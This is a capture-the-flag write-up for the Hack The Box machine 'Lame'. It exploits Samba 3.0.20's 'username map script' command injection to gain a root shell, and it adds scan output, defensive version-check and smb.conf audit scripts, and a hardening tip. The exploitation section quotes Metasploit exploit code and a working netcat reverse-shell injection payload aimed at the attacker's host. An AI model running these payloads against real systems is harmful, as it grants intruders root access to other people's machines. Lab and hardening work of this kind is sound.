Lame Writeup

Lame was the first box released on HTB (as far as I can tell). It’s a super easy box, easily knocked over with a Samba version exploit to a root shell.

System Vulnerable: 10.10.10.3

Vulnerability Explanation: The MS-RPC functionality in smbd in Samba 3.0.0 through 3.0.25rc3 allows remote attackers to execute arbitrary commands via shell metacharacters involving the SamrChangePassword function, when the "username map script" smb.conf option is enabled, and allows remote authenticated users to execute commands via shell metacharacters involving other MS-RPC functions in the remote printer and file share management.

Vulnerability Fix: These vulnerabilities are addressed in Samba version 3.0.25. In addition, patches are available to address this vulnerability in Samba version 3.0.24. Refer to the Samba Security Releases website for more information.

Privilege Escalation Vulnerability: NONE

Vulnerability Fix: NONE

Severity: Critical

An initial nmap scan revealed Samba smbd version 3.0.20-Debian.

┌──(root💀kali)-[/root/CTF/htb/linux/lame]
└─# cat nmap/initial
# Nmap 7.92 scan initiated Sat Oct  1 22:23:01 2022 as: nmap -sC -sV -v -oN nmap/initial 10.10.10.3
Nmap scan report for 10.10.10.3
Host is up (0.31s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.16.7
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name: 
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2022-10-01T17:23:54-04:00
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 2h00m09s, deviation: 2h49m47s, median: 5s

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Oct  1 22:24:25 2022 -- 1 IP address (1 host up) scanned in 84.15 seconds
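The Vulnerability Explanation above gives the affected range (Samba 3.0.0 through 3.0.25rc3, fixed in 3.0.25), and the nmap output reports the banner "Samba smbd 3.0.20-Debian" on 445/tcp while 139/tcp only yields the vague "3.X - 4.X". The following script is an added example, not part of the original writeup or of nmap: it parses lines in nmap normal (-oN) output and classifies each Samba banner against that range, treating a release candidate such as 3.0.25rc3 as older than the fixed 3.0.25 release. The sample scan lines are constructed to mirror the ones in the writeup.

```python
"""Classify Samba smbd banners from nmap -oN output against the affected range.

Added example for this writeup, not part of the page or of Samba/nmap.
Range and fix version come from the Vulnerability Explanation section:
affected = 3.0.0 through 3.0.25rc3, fixed = 3.0.25.
"""
import re

# Constructed sample lines in nmap normal-output format (not a real scan).
SAMPLE_SCAN = """\
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.25rc3 (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.25 (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.13.17-Ubuntu (workgroup: WORKGROUP)
"""

# A version key is (major, minor, patch, is_final, rc_number) so that
# 3.0.25rc3 -> (3, 0, 25, 0, 3) sorts before the final 3.0.25 -> (3, 0, 25, 1, 0).
FIRST_AFFECTED = (3, 0, 0, 1, 0)
FIXED = (3, 0, 25, 1, 0)

VERSION_RE = re.compile(r"Samba smbd (\d+)\.(\d+)\.(\d+)(?:rc(\d+))?")


def version_key(line):
    """Return the comparable version key, or None when nmap only reports a
    range such as '3.X - 4.X' (the banner on 139/tcp in the writeup)."""
    m = VERSION_RE.search(line)
    if not m:
        return None
    major, minor, patch = (int(m.group(i)) for i in (1, 2, 3))
    if m.group(4) is not None:
        return (major, minor, patch, 0, int(m.group(4)))
    return (major, minor, patch, 1, 0)


def is_affected(key):
    """True when the version lies in [3.0.0, 3.0.25), which includes 3.0.25rc3."""
    return FIRST_AFFECTED <= key < FIXED


def classify(line):
    key = version_key(line)
    if key is None:
        return "unknown"  # vague banner: confirm with the 445/tcp fingerprint
    return "affected" if is_affected(key) else "not affected"


def scan_report(text):
    """Return (port, banner version text, verdict) for every Samba smbd line."""
    results = []
    for line in text.splitlines():
        if "Samba smbd" not in line:
            continue
        port = line.split("/", 1)[0]
        banner = line.split("Samba smbd ", 1)[1].split(" (", 1)[0]
        results.append((port, banner, classify(line)))
    return results


if __name__ == "__main__":
    for port, banner, verdict in scan_report(SAMPLE_SCAN):
        print(f"{port:>5}/tcp  {banner:<16} {verdict}")
```

The "unknown" verdict matters in practice: nmap's 139/tcp fingerprint alone would leave a 3.0.20 host unflagged, so only the precise banner (here from 445/tcp) should be used to decide whether the host falls inside the affected range.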

FTP (21/tcp)

Anonymous FTP login is enabled, but no files or folders are shared.

┌──(root💀kali)-[/root/CTF/htb/linux/lame]
└─# ftp 10.10.10.3
Connected to 10.10.10.3.
220 (vsFTPd 2.3.4)
Name (10.10.10.3:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        65534        4096 Mar 17  2010 .
drwxr-xr-x    2 0        65534        4096 Mar 17  2010 ..
226 Directory send OK.
ftp> cd /
250 Directory successfully changed.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        65534        4096 Mar 17  2010 .
drwxr-xr-x    2 0        65534        4096 Mar 17  2010 ..
226 Directory send OK.
ftp> 

Samba (445/tcp)

Using smbclient, list all services available on the server.

┌──(root💀kali)-[/root/CTF/htb/linux/lame]
└─# smbclient -L 10.10.10.3
Enter WORKGROUP\kali's password: 
Anonymous login successful

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	tmp             Disk      oh noes!
	opt             Disk      
	IPC$            IPC       IPC Service (lame server (Samba 3.0.20-Debian))
	ADMIN$          IPC       IPC Service (lame server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful

	Server               Comment
	---------            -------

	Workgroup            Master
	---------            -------
	WORKGROUP            LAME

Using the searchsploit tool, search for any public vulnerability related to Samba 3.0.20:

┌──(root💀kali)-[/root/CTF/htb/linux/lame]
└─# searchsploit samba 3.0.20
---------------------------------------------------------- ---------------------------------
 Exploit Title                                            |  Path
---------------------------------------------------------- ---------------------------------
Samba 3.0.10 < 3.3.5 - Format String / Security Bypass    | multiple/remote/10095.txt
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command | unix/remote/16320.rb
Samba < 3.0.20 - Remote Heap Overflow                     | linux/remote/7701.txt
Samba < 3.0.20 - Remote Heap Overflow                     | linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Service (PoC)             | linux_x86/dos/36741.py
---------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Read the "Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)" exploit, then use the same methodology to exploit the Samba vulnerability manually.

... SNIP ...
def exploit
  connect
  # lol?
  username = "/=`nohup " + payload.encoded + "`"
  begin
    simple.client.negotiate(false)
    simple.client.session_setup_ntlmv1(username, rand_text(16), datastore['SMBDomain'], false)
  rescue ::Timeout::Error, XCEPT::LoginError
    # nothing, it either worked or it didn't ;)
  end

  handler
end
... SNIP ...

Access the tmp share using smbclient.

┌──(root💀kali)-[/root/CTF/htb/linux/lame]
└─# smbclient //10.10.10.3/tmp
Enter WORKGROUP\kali's password: 
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Oct  1 22:56:43 2022
  ..                                 DR        0  Sat Oct 31 07:33:58 2020
  5559.jsvc_up                        R        0  Sat Oct  1 22:14:04 2022
  .ICE-unix                          DH        0  Sat Oct  1 22:13:03 2022
  vmware-root                        DR        0  Sat Oct  1 22:13:35 2022
  .X11-unix                          DH        0  Sat Oct  1 22:13:27 2022
  .X0-lock                           HR       11  Sat Oct  1 22:13:27 2022
  vgauthsvclog.txt.0                  R     1600  Sat Oct  1 22:13:01 2022

		7282168 blocks of size 1024. 5386516 blocks available
smb: \> 

Launch an nc listener on the local machine and execute the exploit as follows:

session setup failed: NT_STATUS_LOGON_FAILURE
smb: \> logon "/=`nohup nc -e /bin/sh 10.10.16.7 9001 `"
Password: 

At this step, enter any password.

A reverse shell is received as user root:

┌──(root💀kali)-[/root/CTF/htb/linux/lame]
└─# nc -nvlp 9001
listening on [any] 9001 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.3] 42753
whoami
root

As a further step, spawn a TTY with python as follows to make the shell more usable.

┌──(root💀kali)-[/root/CTF/htb/linux/lame]
└─# nc -nvlp 9001
listening on [any] 9001 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.3] 45036
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
root@lame:/# 

Proof - User

root@lame:/home/makis# cat user.txt && hostname && whoami && ifconfig
cat user.txt && hostname && whoami && ifconfig
19c9caccaf70854950bc41eaf663a9e6
lame
root
eth0      Link encap:Ethernet  HWaddr 00:50:56:b9:70:16  
          inet addr:10.10.10.3  Bcast:10.10.10.255  Mask:255.255.255.0
          inet6 addr: dead:beef::250:56ff:feb9:7016/64 Scope:Global
          inet6 addr: fe80::250:56ff:feb9:7016/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:269886 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1269 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:18105748 (17.2 MB)  TX bytes:131780 (128.6 KB)
          Interrupt:19 Base address:0x2024 

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:560 errors:0 dropped:0 overruns:0 frame:0
          TX packets:560 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:253297 (247.3 KB)  TX bytes:253297 (247.3 KB)

root@lame:/home/makis# 

Proof - Root

root@lame:/root# cat root.txt && hostname && whoami && ifconfig
cat root.txt && hostname && whoami && ifconfig
22875beab6b5c2f46568db03157a46f6
lame
root
eth0      Link encap:Ethernet  HWaddr 00:50:56:b9:70:16  
          inet addr:10.10.10.3  Bcast:10.10.10.255  Mask:255.255.255.0
          inet6 addr: dead:beef::250:56ff:feb9:7016/64 Scope:Global
          inet6 addr: fe80::250:56ff:feb9:7016/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:269842 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1249 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:18102276 (17.2 MB)  TX bytes:128941 (125.9 KB)
          Interrupt:19 Base address:0x2024 

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:556 errors:0 dropped:0 overruns:0 frame:0
          TX packets:556 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:251253 (245.3 KB)  TX bytes:251253 (245.3 KB)

root@lame:/root# 

Hardening Tip

Change the value of guest ok = yes to guest ok = no in /etc/samba/smb.conf as follows:

  • smb.conf before the change

[tmp]
   comment = oh noes!
   read only = no
   locking = no
   path = /tmp
   guest ok = yes
  • smb.conf after the change

[tmp]
   comment = oh noes!
   read only = no
   locking = no
   path = /tmp
   guest ok = no

If we try to access the share as we did before, an NT_STATUS_ACCESS_DENIED message is shown:

┌──(root💀kali)-[/root/CTF/htb/linux/lame]
└─# smbclient //10.10.10.3/tmp

Enter WORKGROUP\kali's password: 
Anonymous login successful
tree connect failed: NT_STATUS_ACCESS_DENIED
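The Hardening Tip changes a single share by hand. On a host with many shares it helps to audit the whole smb.conf at once, flagging every share with guest access (Samba also accepts the synonym "public" for "guest ok") and reporting whether the "username map script" option, which the Vulnerability Explanation names as the trigger for the command-execution flaw, is set in [global]. The script below is an added example for this writeup, not part of the page or of the Samba project. The [tmp] section in the sample mirrors the "before" config above; the [global] entries, the [opt] and [print$] parameters and the mapusers.sh path are assumed for illustration.

```python
"""Audit an smb.conf for guest-accessible shares and "username map script".

Added example for this writeup, not part of the page or of Samba. The parser
follows the smb.conf conventions documented by Samba: lines starting with '#'
or ';' are comments, parameter names are case-insensitive, and internal
whitespace in a parameter name is not significant.
"""

# Constructed sample configuration. [tmp] mirrors the writeup's "before"
# config; [global], [opt], [print$] and the script path are assumed.
SAMPLE_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   ; path below is assumed for illustration only
   username map script = /etc/samba/scripts/mapusers.sh
   map to guest = bad user

[tmp]
   comment = oh noes!
   read only = no
   locking = no
   path = /tmp
   guest ok = yes

[opt]
   path = /opt
   public = yes

[print$]
   path = /var/lib/samba/printers
   guest ok = no
"""

GUEST_OK_SYNONYMS = {"guest ok", "public"}  # Samba treats these as the same parameter
TRUE_VALUES = {"yes", "true", "1"}


def normalize_name(name):
    """Lower-case the parameter name and collapse internal whitespace."""
    return " ".join(name.lower().split())


def parse_smb_conf(text):
    """Parse smb.conf text into {section: {parameter: value}}."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", ";")):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip()
            sections[current] = {}
            continue
        if current is None or "=" not in line:
            continue
        name, value = line.split("=", 1)
        sections[current][normalize_name(name)] = value.strip()
    return sections


def guest_accessible_shares(sections):
    """Names of shares where 'guest ok' (or its synonym 'public') is enabled."""
    found = []
    for share, params in sections.items():
        if share.lower() == "global":
            continue
        if any(params.get(k, "no").lower() in TRUE_VALUES for k in GUEST_OK_SYNONYMS):
            found.append(share)
    return sorted(found)


def has_username_map_script(sections):
    """True when [global] sets the option named in the Vulnerability Explanation."""
    return bool(sections.get("global", {}).get("username map script"))


def harden(text):
    """Return the config text with every enabled guest ok / public set to no,
    preserving indentation and all other lines unchanged."""
    out = []
    for raw in text.splitlines():
        line = raw.strip()
        if "=" in line and not line.startswith(("#", ";", "[")):
            name, value = line.split("=", 1)
            if normalize_name(name) in GUEST_OK_SYNONYMS and value.strip().lower() in TRUE_VALUES:
                indent = raw[: len(raw) - len(raw.lstrip())]
                out.append(f"{indent}{name.strip()} = no")
                continue
        out.append(raw)
    return "\n".join(out) + "\n"


if __name__ == "__main__":
    conf = parse_smb_conf(SAMPLE_SMB_CONF)
    print("guest-accessible shares:", guest_accessible_shares(conf))
    print("username map script set:", has_username_map_script(conf))
    print(harden(SAMPLE_SMB_CONF))
```

Run it against the real file with `parse_smb_conf(open("/etc/samba/smb.conf").read())`; a non-empty share list or a set "username map script" on a Samba release inside the affected range is the combination this box exposes. Disabling guest access is the configuration fix shown in the Hardening Tip; upgrading to 3.0.25 or later, as the Vulnerability Fix section states, removes the underlying flaw.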
